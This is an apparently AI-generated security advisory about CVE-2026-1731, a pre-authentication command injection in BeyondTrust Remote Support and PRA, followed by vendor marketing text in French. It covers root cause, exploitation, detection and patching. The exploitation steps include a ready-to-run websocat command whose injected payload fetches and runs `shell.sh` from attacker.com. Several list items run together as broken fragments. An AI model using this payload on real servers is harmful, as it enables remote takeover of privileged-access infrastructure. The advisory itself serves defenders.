
PEACH
Un cadre d’isolation des locataires
CVE-2026-1731 is a critical pre-authentication OS command injection vulnerability in BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote Access (PRA). An unauthenticated remote attacker can execute arbitrary operating system commands in the context of the site user by sending specially crafted WebSocket requests. The vulnerability was published on February 6, 2026, with patches released February 17, 2026. Affected versions include BeyondTrust Remote Support prior to 25.3.2 and Privileged Remote Access prior to 25.1. It carries a CVSS v3.1 base score of 9.8 (Critical) and a CVSS v4.0 base score of 9.9 (Critical) (BeyondTrust Advisory, CISA KEV).
The vulnerability is classified as CWE-78 (Improper Neutralization of Special Elements used in an OS Command). The root cause lies in the server-side thin-scc-wrapper script, which performs arithmetic comparisons on attacker-controlled input — specifically the remoteVersion value transmitted during a WebSocket handshake on the /nw endpoint. Bash treats operands in numeric comparisons as expressions rather than plain strings, allowing crafted payloads such as a[$(cmd)]0 to trigger arbitrary command execution during evaluation. Although BeyondTrust added a numeric sanity check in this patch cycle, it does not prevent Bash from performing expression evaluation, leaving the endpoint exploitable. This vulnerability is a variant of CVE-2024-12356, which was previously exploited by the Silk Typhoon threat actor against the U.S. Treasury Department, sharing the same WebSocket endpoint but targeting a different code path. No authentication or user interaction is required, and attack complexity is low (GitHub PoC, GreyNoise).
Successful exploitation allows unauthenticated remote attackers to execute arbitrary OS commands with site user privileges, resulting in full confidentiality, integrity, and availability compromise of the affected system. Observed real-world attacks have led to full Active Directory domain control, deployment of web shells and backdoors, data exfiltration, and installation of remote access trojans including SparkRAT, VShell, and Lumma Stealer. Because BeyondTrust products are privileged access management tools by design, compromise provides attackers with broad lateral movement capabilities across enterprise networks, including access to all systems managed through the BeyondTrust platform. Ransomware gangs have also weaponized this vulnerability, with healthcare and critical infrastructure sectors among the confirmed targets (CISA KEV, Unit 42, BleepingComputer).
/nw WebSocket endpoint on port 443 or non-standard ports./nw endpoint using a tool such as websocat, specifying the protocol header ingredi support desk customer thin and the X-Ns-Company header with the target company name.remoteVersion value containing a Bash arithmetic injection payload, such as hax[$(ATTACKER-COMMAND)] followed by a UUID and other required fields. Example payload structure:echo -ne "hax[\$(curl http://attacker.com/shell.sh|bash)]\naaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa\n0\naaaa\n" | \
./websocat -k wss://TARGET:443/nw \
--protocol "ingredi support desk customer thin" \
-H "X-Ns-Company: COMPANY-NAME" \
--binary -n -thin-scc-wrapper script evaluates the injected expression during Bash arithmetic comparison, executing the embedded command as the site user without any authentication./nw endpoint on BeyondTrust servers from external IPs; outbound connections from BeyondTrust processes to unknown IPs or OAST callback domains; scanning activity targeting port 443 and non-standard ports with ingredi support desk customer thin WebSocket protocol header; JA4+ fingerprints matching known scanner tooling (5-header or 7-header lightweight exploit tools).curl, wget, bash, python, sh); execution of thin-scc-wrapper with anomalous arguments containing special characters like $(), []..php, .jsp, .aspx) in web-accessible directories; unexpected cron jobs or scheduled tasks created by the BeyondTrust service account.remoteVersion values; authentication logs showing new privileged accounts created post-exploitation; Active Directory logs showing unexpected domain admin account creation or group membership changes.BeyondTrust released patches on February 17, 2026. Organizations should immediately upgrade BeyondTrust Remote Support to version 25.3.2 or later, and Privileged Remote Access to version 25.1 or later. BeyondTrust cloud-hosted customers were automatically patched on February 2, 2026. CISA mandated that federal agencies apply mitigations within three days of the KEV listing (due February 16, 2026). As interim measures, restrict network access to BeyondTrust instances to trusted IP ranges only, implement network segmentation to limit exposure, and monitor for suspicious outbound connections and anomalous process execution from BeyondTrust services. If immediate patching is not possible, consider taking affected BeyondTrust instances offline until patching is completed. Organizations should also check for signs of prior compromise, including reviewing logs for WebSocket connections with anomalous remoteVersion values (BeyondTrust Advisory, CISA KEV).
BeyondTrust issued security advisory BT26-02 and patched cloud customers automatically before public disclosure. CISA issued an emergency directive mandating federal agencies patch within three days, reflecting the severity and active exploitation status. Arctic Wolf published a threat campaign update documenting active exploitation following PoC release, and Unit 42 (Palo Alto Networks) published detailed analysis linking exploitation to VShell and SparkRAT deployments. GreyNoise documented reconnaissance activity beginning within 24 hours of PoC publication, noting that the same WebSocket endpoint was previously exploited by Silk Typhoon in the U.S. Treasury breach. Intel 471 published research noting the vulnerability was discovered through AI-assisted analysis, sparking community discussion about AI-driven vulnerability research. The security community on Reddit (r/sysadmin, r/blueteamsec) and social media platforms reacted with urgency given BeyondTrust's role as a privileged access management tool, with many practitioners noting the irony of a PAM tool being the attack vector. Microsoft later linked Storm-1175 (a China-nexus threat actor) to exploitation of this vulnerability in Medusa ransomware operations (GreyNoise, Arctic Wolf, Intel 471, Microsoft Blog).
Source: Ce rapport a été généré à l’aide de l’IA
Évaluation gratuite des vulnérabilités
Évaluez vos pratiques de sécurité cloud dans 9 domaines de sécurité pour évaluer votre niveau de risque et identifier les failles dans vos défenses.
Obtenez une démo personnalisée
"La meilleure expérience utilisateur que j’ai jamais vue, offre une visibilité totale sur les workloads cloud."
"Wiz fournit une interface unique pour voir ce qui se passe dans nos environnements cloud."
"Nous savons que si Wiz identifie quelque chose comme critique, c’est qu’il l’est réellement."